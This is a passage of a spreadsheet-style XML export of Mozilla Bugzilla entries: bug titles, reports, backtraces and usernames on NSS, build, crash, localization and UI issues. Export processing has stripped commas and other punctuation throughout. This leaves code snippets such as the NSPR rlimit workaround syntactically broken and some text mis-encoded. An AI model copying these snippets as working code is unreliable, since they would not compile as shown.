    <t>I installed the gcc build of Mozilla 1.4alpha for OS/2 that was made available
by Mike Kaply at
ftp://ftp.mozilla.org/pub/mozilla/releases/mozilla1.4a/mozilla-os2-gcc-1.4a.zip .
It corrupted my cert8.db and key3.db to the point that even if I went back to
the VACPP build security would no longer initialize.
I believe there is a problem with DBM built under gcc for OS/2 that causes this
database corruption.
Fortunately I was able to restore all my certs &amp; key from a P12 file. Other
people may not be so fortunate.
In the meantime I recommend that this build be pulled because this is a very
serious problem.</t>
  </si>
  <si>
    <t>CORE-189884</t>
  </si>
  <si>
    <t>[ps] postscript output only print an error message not page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3b) Gecko/20030120
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3b) Gecko/20030120
When trying to print any page on a Laserjet 4050 trhe output is an error
message about a too old postscript interpreter (2014.116 instead of 2015 or
greater). A hack using gs is suggested but this makes printing slow and non
portable.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
Actual Results:  
printing of one sheet with hack to print
Expected Results:  
print the page</t>
  </si>
  <si>
    <t>edavid</t>
  </si>
  <si>
    <t>CORE-512487</t>
  </si>
  <si>
    <t>reftest first-letter/399941-8.html regressed on Linux (possible Pango 1.24 issue)</t>
  </si>
  <si>
    <t>Created attachment 396467
screen shot of regression -- yellow pixels are wrong
Reftest 399941-8.html has regressed for me on Linux.  I'm attaching a screen shot of the rendering with differences highlighted -- the olive background on the rightmost Phoenician letter is drawn one pixel bigger on top and bottom than the reference.
At a guess this changed with very recent Pango (I have 1.24).</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-254818</t>
  </si>
  <si>
    <t>[Firefox-Hilfe] cookies.xhtml</t>
  </si>
  <si>
    <t>Tracker fÃ¼r die cookies.xhtml Ãœbersetzung</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-375408</t>
  </si>
  <si>
    <t>For translation the list of categories for extensions and themes on products (Fx Tb SB) is required.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 ru rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Build Identifier: For translation the list of categories for extension and themes on products (Fx Tb SB) is required.
There should be list for thunderbird seamonkey and sunbird extensions and themes  containing informations about their categories (like http://wiki.mozilla.org/User:Shaver/Remora_Categories for Fx).
Reproducible: Always</t>
  </si>
  <si>
    <t>in_fant</t>
  </si>
  <si>
    <t>CORE-80933</t>
  </si>
  <si>
    <t>Use NS_SUCCEEDED instead of NS_OK == result</t>
  </si>
  <si>
    <t>Instead of NS_SUCCEEDED many source files use (NS_OK == result). For example:
http://lxr.mozilla.org/seamonkey/source/content/html/content/src/nsHTMLAnchorEle
ment.cpp
NS_SUCCEEDED is defined in
http://lxr.mozilla.org/seamonkey/source/xpcom/base/nsError.h#84
as
#define NS_FAILED(_nsresult) ((_nsresult) &amp; 0x80000000)
#define NS_SUCCEEDED(_nsresult) (!((_nsresult) &amp; 0x80000000))
Compiled with NS_OK == result the size of the object file is:
16.05.01  16:48                245.269 nsHTMLAnchorElement.obj
Compiled with NS_SUCCEEDED the size of the object file is:
16.05.01  15:32                245.276 nsHTMLAnchorElement.obj
Either way. In order to identify which macro is better (space and
performance wise) one need to replace all NS_OK == result with 
NS_SUCCEEDED.</t>
  </si>
  <si>
    <t>CORE-105138</t>
  </si>
  <si>
    <t>Eliminate Tokens and ParserNodes from HTML parsing</t>
  </si>
  <si>
    <t>The plan is to eliminate Tokens and ParserNodes except with residual style handling.
This will complete the api change to nsIContentSink to not take nodes.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-422660</t>
  </si>
  <si>
    <t>fix ownership/permissions on /mnt/netapp/breakpad/symbols_os on stage</t>
  </si>
  <si>
    <t>Looks like the uids got all screwed up in /mnt/netapp/breakpad/symbols_os on stage:
ls -l *.txt
-rw-r--r--  1        2307 mobile     54 Jun  5  2007 google-gears-symbols.txt
If you could `chgrp -R breakpad * &amp;&amp; chmod -R g+w *` in there that would help me a lot.</t>
  </si>
  <si>
    <t>CORE-448613</t>
  </si>
  <si>
    <t>Initialize nsToolkit correctly when libxul is enabled in a debug version</t>
  </si>
  <si>
    <t>Created attachment 331815
A Proposed patch
nsToolkit::Startup is used to init the nsToolkit. When I build the FF with --enable-debug the windows widgets code is built in a separate dll and it is in the DllMain where the nsToolkit::Startup is called. But if I specify --enable-debug and --enable-libxul there is no point the nsToolkit::Startup is called. And this will cause some error on the debug version FF when it did not run in a debugger.
This patch just fix this by calling nsToolkit::Startup in proper point.</t>
  </si>
  <si>
    <t>Techrazy.Yang</t>
  </si>
  <si>
    <t>CORE-345350</t>
  </si>
  <si>
    <t>crash in js_FreeRuntimeScriptState - jsscript.c</t>
  </si>
  <si>
    <t>js_FreeRuntimeScriptState in jsscript.c crashes when doing GC.
Whenever the rt-&gt;scriptFilenameTable member is NULL this function attempts to iterate using the NULL pointer.</t>
  </si>
  <si>
    <t>MikeM</t>
  </si>
  <si>
    <t>CORE-69363</t>
  </si>
  <si>
    <t>need CF_HTML clipboard format support</t>
  </si>
  <si>
    <t>We should be copying/pasting using CF_HTML as the underlying format.</t>
  </si>
  <si>
    <t>THUNDERBIRD-361286</t>
  </si>
  <si>
    <t>offline indicator only uses color to indicate state</t>
  </si>
  <si>
    <t>in the new tbird theme the offline indicator only uses color to indicate state.
specifically it is the same light bulb either yellow or grey.  (previously it was a plug that was either connected or not.)
from http://developer.mozilla.org/en/docs/Accessible_XUL_Authoring_Guidelines
Don't rely on color alone to present information -- for example don't use different colored dots to indicate different states. Avoid low contrast combinations such as blue-green or other color combinations such as red-green that are troublesome for individuals with color-blindness (10% of men).</t>
  </si>
  <si>
    <t>CALENDAR-458564</t>
  </si>
  <si>
    <t>E-mail based Scheduling (iTIP/iMIP)</t>
  </si>
  <si>
    <t>Mail with no Date header not accepted here failure when sending appointment email to meeting attendees</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-GB rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3
Build Identifier: lightning-0.9-tb-macosx.xpi
I'm testing Lightning with the Zarafa groupware application. When sending an appointment with Send attendees invitations via email checked the send operation fails with the error noted above.
From what I have found this is because the server (Mitel SME Server running qmail/qpsmtpd) strictly enforces RFC2822. This RFC requires a date header.
Reproducible: Always
Steps to Reproduce:
1. Create Event
2. Add attendees
3. Check Send attendees invitations via email
4. Save and Close
5. Check Outlook 2000 dialog
6. Server rejects message
Actual Results:  
The error dialog popped up.
Expected Results:  
Sent out emails to the attendees.</t>
  </si>
  <si>
    <t>grlownzl</t>
  </si>
  <si>
    <t>TOOLKIT-464750</t>
  </si>
  <si>
    <t>Breakpad should use DWARF CFI for stack unwinding</t>
  </si>
  <si>
    <t>We'd like to be able to build with -fomit-frame-pointer on x86 because this frees up a register in functions that have fixed stack frame sizes.  However breakpad can't generate backtraces through functions compiled with -fomit-frame-pointer.
DWARF CFI (Call Frame Information) is instruction-by-instruction annotation of the machine code indicating how to unwind the stack.  We should be able to convert DWARF CFI to the format breakpad uses for this stuff (the STACK WIN records I guess).</t>
  </si>
  <si>
    <t>NSS-202979</t>
  </si>
  <si>
    <t>CERT_ImportCerts always returns SECSuccess</t>
  </si>
  <si>
    <t>CERT_ImportCerts always returns SECSuccess even though some certs may fail to
be installed. I recall there was some discussion about this function but can't
seem to remember what it was.
In any case DS is running into the following case :
They are installing a single CA cert with a nickname of Certificate Manager.
The nickname conflicts with an existing cert of a different subject.
Therefore the CERT_AddTempCertToPerm call fails . However the exported
function CERT_ImportCerts still returns SECSuccess . It even returns a pointer
to a CERTCertificate in my test - but one without a slot set (ie. not a
permanent cert even though keepCerts = PR_TRUE was passed in).
I believe the correct behavior is to return SECFailure in this case. However
there is some added complexity because the function can import more than one
cert. So do we report an error if any cert failed to install in the chain ?
At the very least when there is a single cert imported as in this case there
is no ambiguity we should report the correct status.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-505326</t>
  </si>
  <si>
    <t>can't access firefox/releases/3.5.1/*/ from releases.mozilla.org</t>
  </si>
  <si>
    <t>1. load http://releases.mozilla.org/pub/mozilla.org/firefox/releases/3.5.1
2. click on any of:
[DIR]	contrib-localized/	17-Jul-2009 01:32 	-
[DIR]	contrib/	17-Jul-2009 01:32 	-
[DIR]	linux-i686/	17-Jul-2009 01:32 	-
[DIR]	mac/	17-Jul-2009 01:32 	-
[DIR]	source/	17-Jul-2009 01:32 	-
[DIR]	update/	17-Jul-2009 01:32 	-
[DIR]	win32/	17-Jul-2009 01:32 	- 
actual results:
Firefox 3.5.1 is coming soon!
Thanks for your interest in the upcoming release of Firefox 3.5.1 but there's still a bit more left to do before we're ready. We're asking for our users and fans to be patient and wait until it appears on the official Firefox website before downloading.
While we ask our users to not download directly from the FTP site if you have a reason to do so please continue by FTP.
expected results:
the directories should be browsable http://www.mozilla.com/en-US/firefox/upgrade.html says that 3.5.1 is available.</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-407870</t>
  </si>
  <si>
    <t>Cannot remove freetags from live articles</t>
  </si>
  <si>
    <t>http://support.mozilla.com/kb/Assistive+technology+compatibility has a review tag and edits to freetags made on the staging copy do not carry over to the live version.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-261134</t>
  </si>
  <si>
    <t>Add an overflow menu when there are more open tabs than will fit on screen</t>
  </si>
  <si>
    <t>With the new tabs it is possible to open more tabs than can fit in a window or
resize a window with many tabs such that some of them become inaccessible. A
menu (similar to the one on our toolbar) is needed to allow access to these tabs.</t>
  </si>
  <si>
    <t>MOZILLA_LABS-503575</t>
  </si>
  <si>
    <t>Automatically flush simple storage</t>
  </si>
  <si>
    <t>Flush 1) on a periodic timer and 2) on unload so people don't have to call sync() manually.  We'll leave sync() so people can force flush if they want.</t>
  </si>
  <si>
    <t>adw</t>
  </si>
  <si>
    <t>CORE-282183</t>
  </si>
  <si>
    <t>sync xpfe listbox.xml with toolkit listbox.xml</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-361333</t>
  </si>
  <si>
    <t>Added Justin Scott (AMO/Remora developer).</t>
  </si>
  <si>
    <t>NSS-201259</t>
  </si>
  <si>
    <t>NSS_GetClientAuthData does not work with limited usage certs</t>
  </si>
  <si>
    <t>NSS_GetClientAuthData is the default callback provided by NSS to select a client
authentication certificate. Applications that don't want to write extra code for
client auth can choose to use it. It is unknown how many shipping products use it.
However nearly all of the NSS command-line tools use it.
The problem is that this function searches for client auth certificates by
nickname. It does not check the cert usage. If dual-key certs are deployed
there are multiple certificates matching the nickname. There is a 50% chance
that the callback will pick the encryption cert instead of the SSL client auth cert.
This happened to me while I was developing tests for smartcards - the test
picked the encryption cert on the smartcard and the SSL server refused it
(inadequate key usage).
There are two code paths in this default cert callback :
1) Searches by nickname provided in the void* argument
2) Searches in a list of the nicknames of all user certs that mach the list of
valid CAs provided by the server
Both code paths use PK11_FindCertFromNickname which does not take a usage
therefore they both have this problem.
The fix is to filter certs. The function CERT_FindUserCertByUsage can help for
the first case. In the second case we may need to build a list of certs by
subject and filter by usage ourselves.</t>
  </si>
  <si>
    <t>BUGZILLA-494369</t>
  </si>
  <si>
    <t>Do not throw an error if the 'order' parameter contains invalid columns for buglists</t>
  </si>
  <si>
    <t>As said in bug 491467 comment 5 I want to convert errors thrown when an invalid column is detected in the LASTORDER cookie or in the order list passed from the form to messages displayed at the top of the buglist.
The problem is not critical enough to frighten the user with such errors.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-328373</t>
  </si>
  <si>
    <t>Fix compiler warning for gcc compiles</t>
  </si>
  <si>
    <t>The compiler warning is:
jsdbgapi.c: In function 'JS_EvaluateInStackFrame':
jsdbgapi.c:943: warning: passing argument 3 of 'js_InflateString' from incompatible pointer type</t>
  </si>
  <si>
    <t>CORE-346019</t>
  </si>
  <si>
    <t>Unable to XDR let statements</t>
  </si>
  <si>
    <t>Sicking noticed the other day that we are unable to XDR let statements due to the block object.
I'm working on fixing this.</t>
  </si>
  <si>
    <t>SEAMONKEY-37128</t>
  </si>
  <si>
    <t>update xul for Image Manager dialog</t>
  </si>
  <si>
    <t>[i'm filing this one separately since there have suggestions re: separating
cookie management from image management --see bug 35372.] now that helper styles
have been enabled one can see where xul upgrading is needed (using
2000.04.25.09 opt comm bits). in the Image Manager dialog the following items
need upgrading:
* Remove Site and Remove All Sites are titlebuttons and need to be converted to
's.
* everything boxed in green is in html and needs to be converted to xul
appropriately.</t>
  </si>
  <si>
    <t>SEAMONKEY-24552</t>
  </si>
  <si>
    <t>browser buster only loads a few urls before crashing.</t>
  </si>
  <si>
    <t>At 11:41 AM -0800 1/20/00 Chris Hofmann wrote:
&gt;I'm not able to keep browser buster running very long in release builds
&gt;for the last couple of days.  There are two know[n] bugs. ...
&gt;but there also seems to be a general page loading/refresh problem.
&gt;Does anyone else see this in builds from the tip?
Greg Noel wrote:
I'm glad it's not just me.  I've been seeing this for two or three days
but I've had enough other problems that I wasn't sure if it was a generic
issue.
The first page loads fine but when it's about time for the refresh the
browser crashes.  This happens for both a debug and an optimized build.
The crash does not cause a core dump so I can't get a backtrace.  My gdb
is also acting up (it's complaining about a ptrace failure when the first
thread splits off) so I can't run it under a debugger either.
I'm running MkLinux (a PPC-based Linux implementation) on a Mac 8500/150.
more from chofmann:
On todays linux release build this is what I see after
trying to load a url or two.
Program received signal SIGSEGV Segmentation fault
0x20303220 in ?? ()
(gdb) where
#1  0x40dc6ca5 in NSGetModule ()
#2  0x40d026ff in NSGetModule ()
#3  0x40d9861e in NSGetModule ()
#4  0x40dc7419 in NSGetModule ()
#5  0x40d98750 in NSGetModule ()
#6  0x400fb61f in nsCOMPtr_base::~nsCOMPtr_base ()
#7  0x40dcdce7 in NSGetModule ()
#8  0x40dcd925 in NSGetModule ()
#9  0x400fb66f in nsCOMPtr_base::assign_with_AddRef ()
#10 0x408a9d2f in nsWebShell::Destroy ()
#11 0x40cfc92b in NSGetModule ()
#12 0x40c5317e in NSGetModule ()
#13 0x40dd2e78 in NSGetModule ()
#14 0x40c50d7f in NSGetModule ()
#15 0x40dd2e78 in NSGetModule ()
#16 0x40c50d7f in NSGetModule ()
#17 0x40dd2e78 in NSGetModule ()
#18 0x40c50d7f in NSGetModule ()
#19 0x40c66008 in NSGetModule ()
#20 0x40c488f3 in NSGetModule ()
#21 0x40c4682e in NSGetModule ()
#22 0x40dd2e78 in NSGetModule ()
#23 0x40c50d7f in NSGetModule ()
#24 0x40dd2e78 in NSGetModule ()
#25 0x40c50d7f in NSGetModule ()
#26 0x40c7db69 in NSGetModule ()
#27 0x40c56a8a in NSGetModule ()
#28 0x40c56a1c in NSGetModule ()
#29 0x40c6ecef in NSGetModule ()
#30 0x40c6e9b9 in NSGetModule ()
#31 0x400fb61f in nsCOMPtr_base::~nsCOMPtr_base ()
#32 0x40dcdca3 in NSGetModule ()
#33 0x40dcd925 in NSGetModule ()
#34 0x400fb66f in nsCOMPtr_base::assign_with_AddRef ()
#35 0x408a347e in nsWebShell::Embed ()
#36 0x408a5b56 in nsWebShell::CreateViewer ()
#37 0x408a58b7 in nsWebShell::DoContent ()
#38 0x406a2281 in NSGetModule ()
#39 0x406a1e3f in NSGetModule ()
#40 0x40fbeb33 in NSGetModule ()
#41 0x40fbe5e9 in NSGetModule ()
#42 0x40481983 in NSGetModule ()
#43 0x404812c0 in NSGetModule ()
#44 0x4012ec17 in PL_HandleEvent ()
#45 0x4012eb86 in PL_ProcessPendingEvents ()
#46 0x400f5dba in nsEventQueueImpl::ProcessPendingEvents ()
#47 0x404f9bef in nsAppShell::SetDispatchListener ()</t>
  </si>
  <si>
    <t>MARKETING-610027</t>
  </si>
  <si>
    <t>Email</t>
  </si>
  <si>
    <t>List Import - please bring Developer Survey list into Responsys</t>
  </si>
  <si>
    <t>Please import these 2 lists from Mailchimp account into Responsys (you'll see two lists in there with same name - import both to get all names in): 
Mailchimp list names: 
EC1 Dev Survey 
EC1 Developer Survey - round 1
Responsys fields: DEVELOPER_SURVEY_FLG
Responsys date:  DEVELOPER_SURVEY_DATE
thank you! Eve</t>
  </si>
  <si>
    <t>emurto</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-359687</t>
  </si>
  <si>
    <t>XULRunner pkg packages should correctly follow filename specs</t>
  </si>
  <si>
    <t>Currently XULRunner mac packages are called e.g. xulrunner-pkg-1.9a1.en-US.mac.dmg but this does not follow our package filename convention in that the -pkg part should not be added to the app name but to the platform as a special indicator see http://developer.mozilla.org/en/docs/Package_Filename_Convention
This can easily be achieved by using the MOZ_PKG_SPECIAL var instead of changing MOZ_PKG_APPNAME and I'll attach a patch for that shortly.</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-473321</t>
  </si>
  <si>
    <t>Search: find items in the current edit session</t>
  </si>
  <si>
    <t>Search and highlight items in the current file. When this is done optionally put up a search bar (as well as a search command)</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-119642</t>
  </si>
  <si>
    <t>vertalen: Help | mail_help.html</t>
  </si>
  <si>
    <t>Wordt gedaan door Martijn Kluijtmans .</t>
  </si>
  <si>
    <t>m.kluijtmans</t>
  </si>
  <si>
    <t>MOZILLA_QA_GRAVEYARD-529392</t>
  </si>
  <si>
    <t>[shared module] Helper function to check if URL is identical to targetted one (eliminate redirect issues)</t>
  </si>
  <si>
    <t>We need a helper function which simplifies the way how we can compare the current URL to an expected one. Sometimes redirects will happen which will make it harder to compare.
The function should just open the expected URL and compare it with the current one.</t>
  </si>
  <si>
    <t>BUGZILLA-311973</t>
  </si>
  <si>
    <t>create admin/classifications/footer.html.tmpl</t>
  </si>
  <si>
    <t>This would avoid the code duplication in the different
admin/classifications/*.html.tmpl templates.
GavinS do you want to take this one?</t>
  </si>
  <si>
    <t>nbezzala</t>
  </si>
  <si>
    <t>CORE-52393</t>
  </si>
  <si>
    <t>nsMemoryImpl should not hold references to memory pressure observers</t>
  </si>
  <si>
    <t>nsMemoryImpl uses an nsISupportsArray to hold memory pressure observers. It 
should use nsIObserver (which uses weak references).
This is contributing to an nsXBLService leak (bug 52392).</t>
  </si>
  <si>
    <t>NSPR-326110</t>
  </si>
  <si>
    <t>PR_SetSysfdTableSize and PR_GetSysfdTableMax are not exported</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: 
We are taking Wan-Teh's suggestion and put the ifdef statement to work around the build failure.
Wan-Teh wrote:
I looked at the NSPR source code and bug database.
I believe these two functions are intended to be
exported even though they are not documented in
the NSPR Reference and not declared in any NSPR
header files.
In NSPR 4.6 I added a Linux so that only the
functions declared in our public headers are
exported from our shared libraries.  This is
why you get undefined references for those two
functions on RHEL.
If you have an account in bugzilla.mozilla.org
could you file an NSPR bug report?
https://bugzilla.mozilla.org/enter_bug.cgi?product=NSPR
Meantime I suggest that you temporarily work
around this NSPR bug like this:
#ifdef LINUX
    /*
     * NSPR 4.6 does not export PR_SetSysfdTableSize
     * and PR_GetSysfdTableMax by mistake (NSPR Bugzilla
     * bug xxxxxx) on platforms that use GCC with symbol
     * visibility so we have to call the system calls
     * directly.
     */
    {
        struct rlimit rlim
        if (getrlimit(RLIMIT_NOFILE &amp;rlim) &lt; 0)
            return
        rlim.rlim_cur = rlim.rlim_max
        (void) setrlimit(RLIMIT_NOFILE 
    }
#else
    PR_SetSysfdTableSize(PR_GetSysfdTableMax())
#endif
Wan-Teh 
Reproducible: Always</t>
  </si>
  <si>
    <t>nhosoi</t>
  </si>
  <si>
    <t>CORE-521631</t>
  </si>
  <si>
    <t>remove SVGSVGElement::createSVGString()</t>
  </si>
  <si>
    <t>Created attachment 405738
Patch
SVGSVGElement::createSVGString() was removed between SVG 1.0 CR and PR. No recommendations use it.
http://www.w3.org/TR/2001/PR-SVG-20010719/changes.html
&gt; DOM: Removed method createSVGString() after implementation feedback about this method being unnecessary and how it is problematic with the Java bindings of the DOM.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-95935</t>
  </si>
  <si>
    <t>bugathon queries don't work</t>
  </si>
  <si>
    <t>Gerv the queries on the page contain donttest and makingtest keywords that are
not any longer used in bugzilla. I would definetely not like to let this page
die I am all the times wondering how unconfirmed layout bugs can be confirmed
without a testcase. If you need help I can change the page and attach it to the bug.
Bernd</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-671470</t>
  </si>
  <si>
    <t>Fennec release mozconfigs should use -j1</t>
  </si>
  <si>
    <t>...to be consistent with Firefox.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-328454</t>
  </si>
  <si>
    <t>mailbox protocol in email message causes crash</t>
  </si>
  <si>
    <t>in a message:
f00kb1l&gt;
crashes thunderbird and suite with a stack that may be the result of null
 pointer.
imho the mailbox protocol shouldn't be allowed from untrusted content
because it eventually may allow modification of mailboxes.
can someone give an example of a valid mailbox url that modifies mailboxes?</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-873503</t>
  </si>
  <si>
    <t>[browser-helper] Add more buttons to the fake device layout instead of the developer panel</t>
  </si>
  <si>
    <t>Created attachment 751060
Patch
Let's make it more friendly.</t>
  </si>
  <si>
    <t>CORE-473974</t>
  </si>
  <si>
    <t>Running mochitest asserts: ASSERTION: Element without owner document</t>
  </si>
  <si>
    <t>The assertion is something quite new I think.
(And the assertion shouldn't be an assertion but a warning at least until
 we change elements to own their owner document)
Maybe something is missing IsIndoc() or GetOwnerDoc() check.
###!!! ASSERTION: Element without owner document: 'Error' file /home/smaug/mozilla/mozilla_cvs/hg/mozilla/content/base/src/nsGenericElement.cpp line 2987
#7  0x00002aaab0977cab in nsGenericElement::GetBaseURI (this=)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/content/base/src/nsGenericElement.cpp:2987
#8  0x00002aaab09f9702 in nsGenericHTMLElement::GetBaseURI (this=0x3b17880)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/content/html/content/src/nsGenericHTMLElement.cpp:1238
#9  0x00002aaab09f6d1d in nsGenericHTMLElement::GetHrefURIForAnchors (this=0x3b17880 aURI=0x7fff50946ab0)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/content/html/content/src/nsGenericHTMLElement.cpp:1066
#10 0x00002aaab09f2ef9 in nsHTMLDNSPrefetch::nsDeferrals::SubmitQueue (this=0xe2b270)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/content/html/content/src/nsHTMLDNSPrefetch.cpp:286
#11 0x00002aaab09f307a in nsHTMLDNSPrefetch::nsDeferrals::OnStateChange (this=0xe2b270 aWebProgress= 
    aRequest= progressStateFlags=131088 aStatus=)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/content/html/content/src/nsHTMLDNSPrefetch.cpp:363
#12 0x00002aaab28dafbc in nsDocLoader::FireOnStateChange (this=0xccaba0 aProgress=0x2c45a58 aRequest=0x35624f0 
    aStateFlags=131088 aStatus=0) at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/uriloader/base/nsDocLoader.cpp:1235
#13 0x00002aaab28dafe6 in nsDocLoader::FireOnStateChange (this=0x103b550 aProgress=0x2c45a58 aRequest=0x35624f0 
    aStateFlags=131088 aStatus=0) at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/uriloader/base/nsDocLoader.cpp:1242
#14 0x00002aaab28dafe6 in nsDocLoader::FireOnStateChange (this=0x151a600 aProgress=0x2c45a58 aRequest=0x35624f0 
    aStateFlags=131088 aStatus=0) at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/uriloader/base/nsDocLoader.cpp:1242
#15 0x00002aaab28dafe6 in nsDocLoader::FireOnStateChange (this=0x2c45a30 aProgress=0x2c45a58 aRequest=0x35624f0 
    aStateFlags=131088 aStatus=0) at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/uriloader/base/nsDocLoader.cpp:1242
#16 0x00002aaab28db1de in nsDocLoader::doStopDocumentLoad (this=0x2c45a30 request=0x35624f0 aStatus=0)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/uriloader/base/nsDocLoader.cpp:858
#17 0x00002aaab28dc2e2 in nsDocLoader::DocLoaderIsEmpty (this=0x2c45a30)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/uriloader/base/nsDocLoader.cpp:763
#18 0x00002aaab28dc44f in nsDocLoader::OnStopRequest (this=0x2c45a30 aRequest=0x2aaabcb3d890 aCtxt= 
    aStatus=0) at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/uriloader/base/nsDocLoader.cpp:679
#19 0x00002aaab714cf91 in nsLoadGroup::RemoveRequest (this=0x2c53f20 request=0x2aaabcb3d890 ctxt=0x0 aStatus=0)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/netwerk/base/src/nsLoadGroup.cpp:688
#20 0x00002aaab0950c03 in nsDocument::DoUnblockOnload (this=0x2aaabd5c0b50)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/content/base/src/nsDocument.cpp:7063
#21 0x00002aaab0956382 in nsDocument::DispatchContentLoadedEvents (this=0x2aaabd5c0b50)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/content/base/src/nsDocument.cpp:3973
#22 0x00002aaab095b59d in nsRunnableMethod::Run (this=0xffffffffffffffff)
    at ../../../dist/include/xpcom/nsThreadUtils.h:264
#23 0x00002aaaab27e121 in nsThread::ProcessNextEvent (this=0x66bfa0 mayWait=1 result=0x7fff509472ac)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/xpcom/threads/nsThread.cpp:510
#24 0x00002aaaab23b7e7 in NS_ProcessNextEvent_P (thread=0x2391 mayWait=1) at nsThreadUtils.cpp:230
#25 0x00002aaab9df7af6 in nsBaseAppShell::Run (this=0xced9b0)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/widget/src/xpwidgets/nsBaseAppShell.cpp:170
#26 0x00002aaab766e821 in nsAppStartup::Run (this=0xcd7050)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/toolkit/components/startup/src/nsAppStartup.cpp:192
---Type  to continue or q  to quit---
#27 0x00002aaaaaae9fd9 in XRE_main (argc= argv= aAppData=)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/toolkit/xre/nsAppRunner.cpp:3210
#28 0x0000000000400eca in main (argc=5 argv=0x0)
    at /home/smaug/mozilla/mozilla_cvs/hg/mozilla/browser/app/nsBrowserApp.cpp:156</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-414125</t>
  </si>
  <si>
    <t>Makefile change</t>
  </si>
  <si>
    <t>Created attachment 299417
Patch
Rebuild ast-decode.es also.</t>
  </si>
  <si>
    <t>FIREFOX-504387</t>
  </si>
  <si>
    <t>Cache keys after creating/PUTting them instead of after GETting</t>
  </si>
  <si>
    <t>Because of 504135 it's possible that we PUT a key and try grabbing it and it doesn't exist. We can work around this by caching them after PUTting.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-476641</t>
  </si>
  <si>
    <t>parsing RSS of Planet Python outputs a lot of (no subject) articles</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 zh-CN rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 GTB5
Build Identifier: 2.0.0.19
When I subscribed Planet Python's RSS feed(http://planet.python.org/rss10.xml) thunderbird give me a lot of articles without content. 
Reproducible: Always
Steps to Reproduce:
0. Create a 'News &amp; Blogs' account
1. In account settings check 'show summary of article rather than original whole page by default' (I'm using the zh-CN version and don't know the exact english string for this)
2. Subscribe http://planet.python.org/rss10.xml
3. TB starts to parsing that RSS and the summary window show some (not all) entries labeld '(no subject)' and there's no content for each entry (without step 2 TB can correctly connect the original URL of that entry)</t>
  </si>
  <si>
    <t>bamanzi</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-229270</t>
  </si>
  <si>
    <t>[xft] non-BMP Unicode character rendering broken</t>
  </si>
  <si>
    <t>I've just found that non-BMP (Unicode plane 1 and above) character rendering is
broken in 1.6 branch and the trunk. I went back to nsFontMetricsXft.cpp v 1.29
and went upward until I found the revision with regression. It's version 1.34
[1] for bug 223813 that broke the plane 1 rendering. I haven't yet figured out 
how it could broke the non-BMP Unicode character rendering.  
I think we have to fix this before releasing 1.6. It may not be important to
everyday use yet but it has a high 'geek' value. Besides some Chinese people
may have some practical reasons for non-BMP character support (plane 2).
Tex's  page given in the URL field have links to fonts (Code2001 and other two
fonts) to install to test the demo page. Code2001 alone should be enough for
testing. 
[1]
http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&amp;whitespace_mode=show&amp;file=nsFontMetricsXft.cpp&amp;branch=&amp;root=/cvsroot&amp;subdir=mozilla/gfx/src/gtk&amp;command=DIFF_FRAMESET&amp;rev1=1.33&amp;rev2=1.34</t>
  </si>
  <si>
    <t>CORE-415929</t>
  </si>
  <si>
    <t>JavaScript onKeyDown event is not fired in certain Command + key combinations</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O de rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O de rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
The JavaScript event onKeyDown is not fired for certain keys when the command-key is involved e.g. Command+A Command+N Command+B
Only the onKeyUp is fired when the 2nd key has been released and the onKeyPress event only when the auto-key-repeat comes in - but no onKeyDown or onKeyPress event on first touch.
